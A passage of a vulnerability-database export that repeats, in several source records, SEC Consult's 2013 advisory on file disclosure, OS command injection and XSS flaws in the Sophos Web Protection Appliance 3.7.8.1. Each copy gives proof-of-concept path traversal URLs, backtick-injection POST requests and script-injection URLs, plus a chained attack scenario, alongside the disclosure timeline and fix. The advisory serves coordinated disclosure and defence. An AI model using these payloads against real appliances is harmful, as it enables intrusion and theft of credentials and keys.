139\r\n"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153"\r\n"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"\r\n\r\n\r\n2) OS command injection (CVE-2013-2642)\r\nThe "Diagnostic Tools" functionality allows an authenticated user to inject\r\narbitrary operating system commands enclosed in backticks (`). 
These commands\r\nare run with the privileges of the operating system user "spiderman":\r\n\r\nPOST /index.php?c=diagnostic_tools HTTP/1.1\r\nHost: <host>\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 92\r\nCache-Control: no-cache\r\n\r\naction=wget&section=configuration&STYLE=<valid session id>&url=%60sleep%205%60\r\n\r\n\r\nThe "Local Site List" functionality allows injection of arbitrary OS commands:\r\n\r\nPOST /index.php?c=local_site_list_editor HTTP/1.1\r\nHost: <host>\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 205\r\n\r\nSTYLE=<valid session\r\nid>&action=save&entries=[{"url"%3a+".'`sleep+10`'",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]\r\n\r\nNote: Unauthenticated users can retrieve valid session IDs using the\r\nvulnerability in 1).\r\n\r\nIf a customized template for the "Block page" uses the variable\r\n"%%user_workstation%%", an _unauthenticated_ user can inject OS commands using the\r\nfollowing URL:\r\n\r\nhttps://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60\r\n\r\n\r\n3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)\r\nThe following URLs demonstrate reflected Cross Site Scripting vulnerabilities:\r\n\r\nhttps://<host>/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E\r\nhttps://<host>/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d\r\nhttps://<host>/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E\r\nhttps://<host>/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E\r\n\r\nAs the application uses URL parameters to transmit session IDs rather\r\nthan cookies, session stealing attacks cannot be executed using these flaws.\r\nHowever, these vulnerabilities can still be used to fake login pages for\r\nphishing purposes.\r\nFurthermore the vulnerabilities in 1) and 
2) can be exploited via one of the\r\nXSS vulnerabilities. This enables attacks on the appliance even when the\r\nweb interface would otherwise not be reachable to the attacker.\r\n\r\nPossible attack scenario:\r\nUse XSS to run malicious JavaScript in the browser of a user who has network\r\naccess to the web interface. This code can:\r\n- Exploit the local file disclosure vulnerability (see 1) in order to gain\r\n access to valid session IDs and impersonate administrator users.\r\n- Exploit the OS command injection (see 2) in order to execute arbitrary\r\n commands on the system.\r\n- Exfiltrate sensitive information like HTTP, (plaintext) HTTPS traffic or the\r\n private key for the CA certificate used for HTTPS scanning (MITM).\r\n\r\n\r\nVulnerable / tested versions:\r\n-----------------------------\r\nThe vulnerabilities have been verified to exist in the Sophos Web Protection\r\nAppliance version 3.7.8.1, which was the most recent version at the time of\r\ndiscovery.\r\n\r\n\r\nVendor contact timeline:\r\n------------------------\r\n2013-02-22: Sending advisory and proof of concept exploit via encrypted\r\n channel.\r\n2013-02-23: Vendor acknowledges receipt of advisory.\r\n2013-03-01: Vendor confirms reported issues and provides preliminary\r\n information about release dates.\r\n2013-03-07: Conference call: Addressing the risks the discovered\r\n vulnerabilities pose to customers and release schedule.\r\n2013-03-18: Vendor starts rollout of update to "a first group of customers".\r\n2013-04-03: SEC Consult releases coordinated security advisory.\r\n\r\n\r\nSolution:\r\n---------\r\nUpdate to Web Protection Appliance version 3.7.8.2.\r\n\r\nMore information can be found at:\r\nhttp://www.sophos.com/en-us/support/knowledgebase/118969.aspx\r\n\r\n\r\nWorkaround:\r\n-----------\r\nNo workaround available.\r\n\r\n\r\nAdvisory 
URL:\r\n--------------\r\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\r\n\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nSEC Consult Unternehmensberatung GmbH\r\n\r\nOffice Vienna\r\nMooslackengasse 17\r\nA-1190 Vienna\r\nAustria\r\n\r\nTel.: +43 / 1 / 890 30 43 - 0\r\nFax.: +43 / 1 / 890 30 43 - 25\r\nMail: research at sec-consult dot com\r\nhttps://www.sec-consult.com\r\nhttp://blog.sec-consult.com\r\n\r\n\r\nEOF Wolfgang Ettlinger, Stefan Viehbock / @2013\r\n", "edition": 1, "modified": "2013-04-08T00:00:00", "published": "2013-04-08T00:00:00", "id": "SECURITYVULNS:DOC:29238", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29238", "title": "SEC Consult SA-20130403-0 :: Multiple vulnerabilities in Sophos Web Protection Appliance", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-02-19T13:31:12", "description": "Sophos Web Protection Appliance version 3.7.8.1 suffers from OS command injection, cross site scripting, and file disclosure vulnerabilities.", "edition": 2, "published": "2013-04-04T00:00:00", "type": "zdt", "title": "Sophos Web Protection Appliance 3.7.8.1 XSS / Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2641", "CVE-2013-2643", "CVE-2013-2642"], "modified": "2013-04-04T00:00:00", "id": "1337DAY-ID-20603", "href": "https://0day.today/exploit/description/20603", "sourceData": "=======================================================================\r\n title: Multiple vulnerabilities\r\n product: Sophos Web Protection Appliance\r\n vulnerable version: <= 3.7.8.1\r\n fixed version: 3.7.8.2\r\n impact: Critical\r\n CVE number: CVE-2013-2641, CVE-2013-2642, CVE-2013-2643\r\n homepage: http://www.sophos.com/\r\n found: 2013-01-14\r\n by: Wolfgang Ettlinger\r\n SEC Consult Vulnerability Lab\r\n 
https://www.sec-consult.com\r\n\r\n=======================================================================\r\n\r\nVendor/product description:\r\n-----------------------------\r\n\"Our award-winning Secure Web Gateway appliances make web protection easy.\r\nThey are quick to setup, simple to manage and make policy administration a\r\nsnap, even for non-technical users.\"\r\n\r\nURL: http://www.sophos.com/en-us/products/web/web-protection.aspx\r\n\r\n\r\nBusiness recommendation:\r\n------------------------\r\nSEC Consult has identified several vulnerabilities within the components of\r\nthe Sophos Web Protection Appliance in the course of a short crash test. Some\r\ncomponents have been spot-checked, while others have not been tested at all.\r\n\r\nAn attacker can get unauthorized access to the appliance and plant backdoors or\r\naccess configuration files containing credentials for other systems (eg. Active\r\nDirectory/FTP login) which can be used in further attacks.\r\nSince all web traffic passes through the appliance, interception of HTTP as\r\nwell as the plaintext form of HTTPS traffic (if HTTPS Scanning feature in use),\r\nincluding sensitive information like passwords and session Cookies is possible.\r\nIf HTTPS Scanning is enabled, the appliance holds a private key for a\r\nCertificate Authority (CA) certificate that is installed/trusted on all\r\nworkstations in the company. If this private key is compromised by an attacker,\r\narbitrary certificates can be signed. 
These certificates will then pass\r\nvalidation on the client machines, enabling various attacks targeting\r\nclients (MITM, phishing, evilgrade, ...).\r\n\r\nThe recommendation of SEC Consult is to switch off the product until a\r\ncomprehensive security audit based on a security source code review has been\r\nperformed and all identified security deficiencies have been resolved by the\r\nvendor.\r\n\r\nVulnerability overview/description:\r\n-----------------------------------\r\n1) Unauthenticated local file disclosure (CVE-2013-2641)\r\nUnauthenticated users can read arbitrary files from the filesystem with the\r\nprivileges of the \"spiderman\" operating system user. These files include\r\nconfiguration files containing sensitive information such as clear text\r\npasswords which can be used in other attacks.\r\nFurthermore the webserver log file which holds valid PHP session IDs can be\r\naccessed. With this information administrator users can be impersonated.\r\n\r\n2) OS command injection (CVE-2013-2642)\r\nAuthenticated users can execute arbitrary commands on the underlying\r\noperating system with the privileges of the \"spiderman\" operating system user.\r\nThis can be used to get persistent access to the affected system (eg. by\r\nplanting backdoors), accessing all kinds of locally stored information or\r\nintercepting web traffic that passes through the appliance.\r\nUnauthenticated users can exploit this kind of vulnerability too (depends on\r\nappliance configuration).\r\n\r\n3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)\r\nReflected Cross Site Scripting vulnerabilities were found. 
An attacker can use\r\nthese vulnerabilities to exploit other vulnerabilities in the web interface\r\nor to conduct phishing attacks.\r\n\r\n\r\nProof of concept:\r\n-----------------\r\n1) Unauthenticated local file disclosure (CVE-2013-2641)\r\nAs an example, an unauthenticated user can download the configuration file\r\ncontaining the salted hash of the administrator password as well as clear text\r\npasswords e.g. for FTP backup storage or Active Directory authentication:\r\n\r\nhttps://<host>/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00\r\n\r\nFurthermore the Apache access log can be retrieved. As PHP session IDs are\r\npassed via the URL rather than via Cookies, these can be found in this log\r\nfile and effectively used to impersonate administrator users:\r\n\r\nhttps://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00\r\n\r\nAn excerpt from the log file shows that it contains PHP session ID information\r\n(parameter \"STYLE\").\r\n<host> - - [21/Feb/2013:17:02:17 +0000] \"POST /index.php?c=dashboard HTTP/1.1\" 200 139\r\n\"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153\"\r\n\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0\"\r\n\r\n\r\n2) OS command injection (CVE-2013-2642)\r\nThe \"Diagnostic Tools\" functionality allows an authenticated user to inject\r\narbitrary operating system commands enclosed in backticks (`). 
These commands\r\nare run with the privileges of the operating system user \"spiderman\":\r\n\r\nPOST /index.php?c=diagnostic_tools HTTP/1.1\r\nHost: <host>\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 92\r\nCache-Control: no-cache\r\n\r\naction=wget&section=configuration&STYLE=<valid session id>&url=%60sleep%205%60\r\n\r\n\r\nThe \"Local Site List\" functionality allows injection of arbitrary OS commands:\r\n\r\nPOST /index.php?c=local_site_list_editor HTTP/1.1\r\nHost: <host>\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 205\r\n\r\nSTYLE=<valid session\r\nid>&action=save&entries=[{\"url\"%3a+\".'`sleep+10`'\",+\"range\"%3a+\"no\",+\"tld\"%3a+\"yes\",+\"valid_range\"%3a+\"no\"}]\r\n\r\nNote: Unauthenticated users can retrieve valid session IDs using the\r\nvulnerability in 1).\r\n\r\nIf a customized template for the \"Block page\" uses the variable\r\n\"%%user_workstation%%\", an _unauthenticated_ user can inject OS commands using the\r\nfollowing URL:\r\n\r\nhttps://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60\r\n\r\n\r\n3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)\r\nThe following URLs demonstrate reflected Cross Site Scripting vulnerabilities:\r\n\r\nhttps://<host>/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E\r\nhttps://<host>/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d\r\nhttps://<host>/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E\r\nhttps://<host>/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E\r\n\r\nAs the application uses URL parameters to transmit session IDs rather\r\nthan cookies, session stealing attacks cannot be executed using these flaws.\r\nHowever, these vulnerabilities can still be used to fake login pages for\r\nphishing purposes.\r\nFurthermore the 
vulnerabilities in 1) and 2) can be exploited via one of the\r\nXSS vulnerabilities. This enables attacks on the appliance even when the\r\nweb interface would otherwise not be reachable to the attacker.\r\n\r\nPossible attack scenario:\r\nUse XSS to run malicious JavaScript in the browser of a user who has network\r\naccess to the web interface. This code can:\r\n- Exploit the local file disclosure vulnerability (see 1) in order to gain\r\n access to valid session IDs and impersonate administrator users.\r\n- Exploit the OS command injection (see 2) in order to execute arbitrary\r\n commands on the system.\r\n- Exfiltrate sensitive information like HTTP, (plaintext) HTTPS traffic or the\r\n private key for the CA certificate used for HTTPS scanning (MITM).\r\n\r\n\r\nVulnerable / tested versions:\r\n-----------------------------\r\nThe vulnerabilities have been verified to exist in the Sophos Web Protection\r\nAppliance version 3.7.8.1, which was the most recent version at the time of\r\ndiscovery.\r\n\r\n\r\nVendor contact timeline:\r\n------------------------\r\n2013-02-22: Sending advisory and proof of concept exploit via encrypted\r\n channel.\r\n2013-02-23: Vendor acknowledges receipt of advisory.\r\n2013-03-01: Vendor confirms reported issues and provides preliminary\r\n information about release dates.\r\n2013-03-07: Conference call: Addressing the risks the discovered\r\n vulnerabilities pose to customers and release schedule.\r\n2013-03-18: Vendor starts rollout of update to \"a first group of customers\".\r\n2013-04-03: SEC Consult releases coordinated security advisory.\r\n\r\n\r\nSolution:\r\n---------\r\nUpdate to Web Protection Appliance version 3.7.8.2.\r\n\r\nMore information can be found at:\r\nhttp://www.sophos.com/en-us/support/knowledgebase/118969.aspx\r\n\r\n\r\nWorkaround:\r\n-----------\r\nNo workaround available.\n\n# 0day.today [2018-02-19] #", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20603"}], "packetstorm": [{"lastseen": "2016-12-05T22:15:43", "description": "", "published": "2013-04-03T00:00:00", "type": "packetstorm", "title": "Sophos Web Protection Appliance 3.7.8.1 XSS / Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2641", "CVE-2013-2643", "CVE-2013-2642"], "modified": "2013-04-03T00:00:00", "id": "PACKETSTORM:121060", "href": "https://packetstormsecurity.com/files/121060/Sophos-Web-Protection-Appliance-3.7.8.1-XSS-Command-Execution.html", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20130403-0 > \n======================================================================= \ntitle: Multiple vulnerabilities \nproduct: Sophos Web Protection Appliance \nvulnerable version: <= 3.7.8.1 \nfixed version: 3.7.8.2 \nimpact: Critical \nCVE number: CVE-2013-2641, CVE-2013-2642, CVE-2013-2643 \nhomepage: http://www.sophos.com/ \nfound: 2013-01-14 \nby: Wolfgang Ettlinger \nSEC Consult Vulnerability Lab \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor/product description: \n----------------------------- \n\"Our award-winning Secure Web Gateway appliances make web protection easy. \nThey are quick to setup, simple to manage and make policy administration a \nsnap, even for non-technical users.\" \n \nURL: http://www.sophos.com/en-us/products/web/web-protection.aspx \n \n \nBusiness recommendation: \n------------------------ \nSEC Consult has identified several vulnerabilities within the components of \nthe Sophos Web Protection Appliance in the course of a short crash test. Some \ncomponents have been spot-checked, while others have not been tested at all. \n \nAn attacker can get unauthorized access to the appliance and plant backdoors or \naccess configuration files containing credentials for other systems (eg. 
Active \nDirectory/FTP login) which can be used in further attacks. \nSince all web traffic passes through the appliance, interception of HTTP as \nwell as the plaintext form of HTTPS traffic (if HTTPS Scanning feature in use), \nincluding sensitive information like passwords and session Cookies is possible. \nIf HTTPS Scanning is enabled, the appliance holds a private key for a \nCertificate Authority (CA) certificate that is installed/trusted on all \nworkstations in the company. If this private key is compromised by an attacker, \narbitrary certificates can be signed. These certificates will then pass \nvalidation on the client machines, enabling various attacks targeting \nclients (MITM, phishing, evilgrade, ...). \n \nThe recommendation of SEC Consult is to switch off the product until a \ncomprehensive security audit based on a security source code review has been \nperformed and all identified security deficiencies have been resolved by the \nvendor. \n \nVulnerability overview/description: \n----------------------------------- \n1) Unauthenticated local file disclosure (CVE-2013-2641) \nUnauthenticated users can read arbitrary files from the filesystem with the \nprivileges of the \"spiderman\" operating system user. These files include \nconfiguration files containing sensitive information such as clear text \npasswords which can be used in other attacks. \nFurthermore the webserver log file which holds valid PHP session IDs can be \naccessed. With this information administrator users can be impersonated. \n \n2) OS command injection (CVE-2013-2642) \nAuthenticated users can execute arbitrary commands on the underlying \noperating system with the privileges of the \"spiderman\" operating system user. \nThis can be used to get persistent access to the affected system (eg. by \nplanting backdoors), accessing all kinds of locally stored information or \nintercepting web traffic that passes through the appliance. 
\nUnauthenticated users can exploit this kind of vulnerability too (depends on \nappliance configuration). \n \n3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643) \nReflected Cross Site Scripting vulnerabilities were found. An attacker can use \nthese vulnerabilities to exploit other vulnerabilities in the web interface \nor to conduct phishing attacks. \n \n \nProof of concept: \n----------------- \n1) Unauthenticated local file disclosure (CVE-2013-2641) \nAs an example, an unauthenticated user can download the configuration file \ncontaining the salted hash of the administrator password as well as clear text \npasswords e.g. for FTP backup storage or Active Directory authentication: \n \nhttps://<host>/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00 \n \nFurthermore the Apache access log can be retrieved. As PHP session IDs are \npassed via the URL rather than via Cookies, these can be found in this log \nfile and effectively used to impersonate administrator users: \n \nhttps://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00 \n \nAn excerpt from the log file shows that it contains PHP session ID information \n(parameter \"STYLE\"). \n<host> - - [21/Feb/2013:17:02:17 +0000] \"POST /index.php?c=dashboard HTTP/1.1\" 200 139 \n\"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153\" \n\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0\" \n \n \n2) OS command injection (CVE-2013-2642) \nThe \"Diagnostic Tools\" functionality allows an authenticated user to inject \narbitrary operating system commands enclosed in backticks (`). 
These commands \nare run with the privileges of the operating system user \"spiderman\": \n \nPOST /index.php?c=diagnostic_tools HTTP/1.1 \nHost: <host> \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nContent-Length: 92 \nCache-Control: no-cache \n \naction=wget&section=configuration&STYLE=<valid session id>&url=%60sleep%205%60 \n \n \nThe \"Local Site List\" functionality allows injection of arbitrary OS commands: \n \nPOST /index.php?c=local_site_list_editor HTTP/1.1 \nHost: <host> \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nContent-Length: 205 \n \nSTYLE=<valid session \nid>&action=save&entries=[{\"url\"%3a+\".'`sleep+10`'\",+\"range\"%3a+\"no\",+\"tld\"%3a+\"yes\",+\"valid_range\"%3a+\"no\"}] \n \nNote: Unauthenticated users can retrieve valid session IDs using the \nvulnerability in 1). \n \nIf a customized template for the \"Block page\" uses the variable \n\"%%user_workstation%%\", an _unauthenticated_ user can inject OS commands using the \nfollowing URL: \n \nhttps://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60 \n \n \n3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643) \nThe following URLs demonstrate reflected Cross Site Scripting vulnerabilities: \n \nhttps://<host>/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E \nhttps://<host>/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d \nhttps://<host>/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E \nhttps://<host>/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E \n \nAs the application uses URL parameters to transmit session IDs rather \nthan cookies, session stealing attacks cannot be executed using these flaws. \nHowever, these vulnerabilities can still be used to fake login pages for \nphishing purposes. 
\nFurthermore the vulnerabilities in 1) and 2) can be exploited via one of the \nXSS vulnerabilities. This enables attacks on the appliance even when the \nweb interface would otherwise not be reachable to the attacker. \n \nPossible attack scenario: \nUse XSS to run malicious JavaScript in the browser of a user who has network \naccess to the web interface. This code can: \n- Exploit the local file disclosure vulnerability (see 1) in order to gain \naccess to valid session IDs and impersonate administrator users. \n- Exploit the OS command injection (see 2) in order to execute arbitrary \ncommands on the system. \n- Exfiltrate sensitive information like HTTP, (plaintext) HTTPS traffic or the \nprivate key for the CA certificate used for HTTPS scanning (MITM). \n \n \nVulnerable / tested versions: \n----------------------------- \nThe vulnerabilities have been verified to exist in the Sophos Web Protection \nAppliance version 3.7.8.1, which was the most recent version at the time of \ndiscovery. \n \n \nVendor contact timeline: \n------------------------ \n2013-02-22: Sending advisory and proof of concept exploit via encrypted \nchannel. \n2013-02-23: Vendor acknowledges receipt of advisory. \n2013-03-01: Vendor confirms reported issues and provides preliminary \ninformation about release dates. \n2013-03-07: Conference call: Addressing the risks the discovered \nvulnerabilities pose to customers and release schedule. \n2013-03-18: Vendor starts rollout of update to \"a first group of customers\". \n2013-04-03: SEC Consult releases coordinated security advisory. \n \n \nSolution: \n--------- \nUpdate to Web Protection Appliance version 3.7.8.2. \n \nMore information can be found at: \nhttp://www.sophos.com/en-us/support/knowledgebase/118969.aspx \n \n \nWorkaround: \n----------- \nNo workaround available. 
\n \n \nAdvisory URL: \n-------------- \nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nSEC Consult Unternehmensberatung GmbH \n \nOffice Vienna \nMooslackengasse 17 \nA-1190 Vienna \nAustria \n \nTel.: +43 / 1 / 890 30 43 - 0 \nFax.: +43 / 1 / 890 30 43 - 25 \nMail: research at sec-consult dot com \nhttps://www.sec-consult.com \nhttp://blog.sec-consult.com \n \n \nEOF Wolfgang Ettlinger, Stefan Viehb\u00f6ck / @2013 \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/121060/SA-20130403-0.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:49", "description": "\nSophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities", "edition": 1, "published": "2013-04-08T00:00:00", "title": "Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2641", "CVE-2013-2643", "CVE-2013-2642"], "modified": "2013-04-08T00:00:00", "id": "EXPLOITPACK:909AB3D0816FBD028C02331AB9C0821B", "href": "", "sourceData": "SEC Consult Vulnerability Lab Security Advisory < 20130403-0 >\n=======================================================================\n title: Multiple vulnerabilities\n product: Sophos Web Protection Appliance\n vulnerable version: <= 3.7.8.1\n fixed version: 3.7.8.2\n impact: Critical\n CVE number: CVE-2013-2641, CVE-2013-2642, CVE-2013-2643\n homepage: http://www.sophos.com/\n found: 2013-01-14\n by: Wolfgang Ettlinger\n SEC Consult Vulnerability Lab\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor/product description:\n-----------------------------\n\"Our award-winning Secure Web Gateway appliances make web protection easy.\nThey are quick to setup, simple to manage and make policy administration 
a\nsnap, even for non-technical users.\"\n\nURL: http://www.sophos.com/en-us/products/web/web-protection.aspx\n\n\nBusiness recommendation:\n------------------------\nSEC Consult has identified several vulnerabilities within the components of\nthe Sophos Web Protection Appliance in the course of a short crash test. Some\ncomponents have been spot-checked, while others have not been tested at all.\n\nAn attacker can get unauthorized access to the appliance and plant backdoors or\naccess configuration files containing credentials for other systems (eg. Active\nDirectory/FTP login) which can be used in further attacks.\nSince all web traffic passes through the appliance, interception of HTTP as\nwell as the plaintext form of HTTPS traffic (if HTTPS Scanning feature in use),\nincluding sensitive information like passwords and session Cookies is possible.\nIf HTTPS Scanning is enabled, the appliance holds a private key for a\nCertificate Authority (CA) certificate that is installed/trusted on all\nworkstations in the company. If this private key is compromised by an attacker,\narbitrary certificates can be signed. These certificates will then pass\nvalidation on the client machines, enabling various attacks targeting\nclients (MITM, phishing, evilgrade, ...).\n\nThe recommendation of SEC Consult is to switch off the product until a\ncomprehensive security audit based on a security source code review has been\nperformed and all identified security deficiencies have been resolved by the\nvendor.\n\nVulnerability overview/description:\n-----------------------------------\n1) Unauthenticated local file disclosure (CVE-2013-2641)\nUnauthenticated users can read arbitrary files from the filesystem with the\nprivileges of the \"spiderman\" operating system user. 
These files include\nconfiguration files containing sensitive information such as clear text\npasswords which can be used in other attacks.\nFurthermore the webserver log file which holds valid PHP session IDs can be\naccessed. With this information administrator users can be impersonated.\n\n2) OS command injection (CVE-2013-2642)\nAuthenticated users can execute arbitrary commands on the underlying\noperating system with the privileges of the \"spiderman\" operating system user.\nThis can be used to get persistent access to the affected system (eg. by\nplanting backdoors), accessing all kinds of locally stored information or\nintercepting web traffic that passes through the appliance.\nUnauthenticated users can exploit this kind of vulnerability too (depends on\nappliance configuration).\n\n3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)\nReflected Cross Site Scripting vulnerabilities were found. An attacker can use\nthese vulnerabilities to exploit other vulnerabilities in the web interface\nor to conduct phishing attacks.\n\n\nProof of concept:\n-----------------\n1) Unauthenticated local file disclosure (CVE-2013-2641)\nAs an example, an unauthenticated user can download the configuration file\ncontaining the salted hash of the administrator password as well as clear text\npasswords e.g. for FTP backup storage or Active Directory authentication:\n\nhttps://<host>/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00\n\nFurthermore the Apache access log can be retrieved. 
As PHP session IDs are\npassed via the URL rather than via Cookies, these can be found in this log\nfile and effectively used to impersonate administrator users:\n\nhttps://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00\n\nAn excerpt from the log file shows that it contains PHP session ID information\n(parameter \"STYLE\").\n<host> - - [21/Feb/2013:17:02:17 +0000] \"POST /index.php?c=dashboard HTTP/1.1\" 200 139\n\"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153\"\n\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0\"\n\n\n2) OS command injection (CVE-2013-2642)\nThe \"Diagnostic Tools\" functionality allows an authenticated user to inject\narbitrary operating system commands enclosed in backticks (`). These commands\nare run with the privileges of the operating system user \"spiderman\":\n\nPOST /index.php?c=diagnostic_tools HTTP/1.1\nHost: <host>\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nContent-Length: 92\nCache-Control: no-cache\n\naction=wget&section=configuration&STYLE=<valid session id>&url=%60sleep%205%60\n\n\nThe \"Local Site List\" functionality allows injection of arbitrary OS commands:\n\nPOST /index.php?c=local_site_list_editor HTTP/1.1\nHost: <host>\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nContent-Length: 205\n\nSTYLE=<valid session\nid>&action=save&entries=[{\"url\"%3a+\".'`sleep+10`'\",+\"range\"%3a+\"no\",+\"tld\"%3a+\"yes\",+\"valid_range\"%3a+\"no\"}]\n\nNote: Unauthenticated users can retrieve valid session IDs using the\nvulnerability in 1).\n\nIf a customized template for the \"Block page\" uses the variable\n\"%%user_workstation%%\", an _unauthenticated_ user can inject OS commands using the\nfollowing URL:\n\nhttps://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60\n\n\n3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)\nThe following URLs demonstrate reflected Cross Site 
Scripting vulnerabilities:\n\nhttps://<host>/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E\nhttps://<host>/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d\nhttps://<host>/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E\nhttps://<host>/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E\n\nAs the application uses URL parameters to transmit session IDs rather\nthan cookies, session stealing attacks cannot be executed using these flaws.\nHowever, these vulnerabilities can still be used to fake login pages for\nphishing purposes.\nFurthermore the vulnerabilities in 1) and 2) can be exploited via one of the\nXSS vulnerabilities. This enables attacks on the appliance even when the\nweb interface would otherwise not be reachable to the attacker.\n\nPossible attack scenario:\nUse XSS to run malicious JavaScript in the browser of a user who has network\naccess to the web interface. 
This code can:\n- Exploit the local file disclosure vulnerability (see 1) in order to gain\n access to valid session IDs and impersonate administrator users.\n- Exploit the OS command injection (see 2) in order to execute arbitrary\n commands on the system.\n- Exfiltrate sensitive information like HTTP, (plaintext) HTTPS traffic or the\n private key for the CA certificate used for HTTPS scanning (MITM).\n\n\nVulnerable / tested versions:\n-----------------------------\nThe vulnerabilities have been verified to exist in the Sophos Web Protection\nAppliance version 3.7.8.1, which was the most recent version at the time of\ndiscovery.\n\n\nVendor contact timeline:\n------------------------\n2013-02-22: Sending advisory and proof of concept exploit via encrypted\n channel.\n2013-02-23: Vendor acknowledges receipt of advisory.\n2013-03-01: Vendor confirms reported issues and provides preliminary\n information about release dates.\n2013-03-07: Conference call: Addressing the risks the discovered\n vulnerabilities pose to customers and release schedule.\n2013-03-18: Vendor starts rollout of update to \"a first group of customers\".\n2013-04-03: SEC Consult releases coordinated security advisory.\n\n\nSolution:\n---------\nUpdate to Web Protection Appliance version 3.7.8.2.\n\nMore information can be found at:\nhttp://www.sophos.com/en-us/support/knowledgebase/118969.aspx\n\n\nWorkaround:\n-----------\nNo workaround available.\n\n\nAdvisory URL:\n--------------\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nSEC 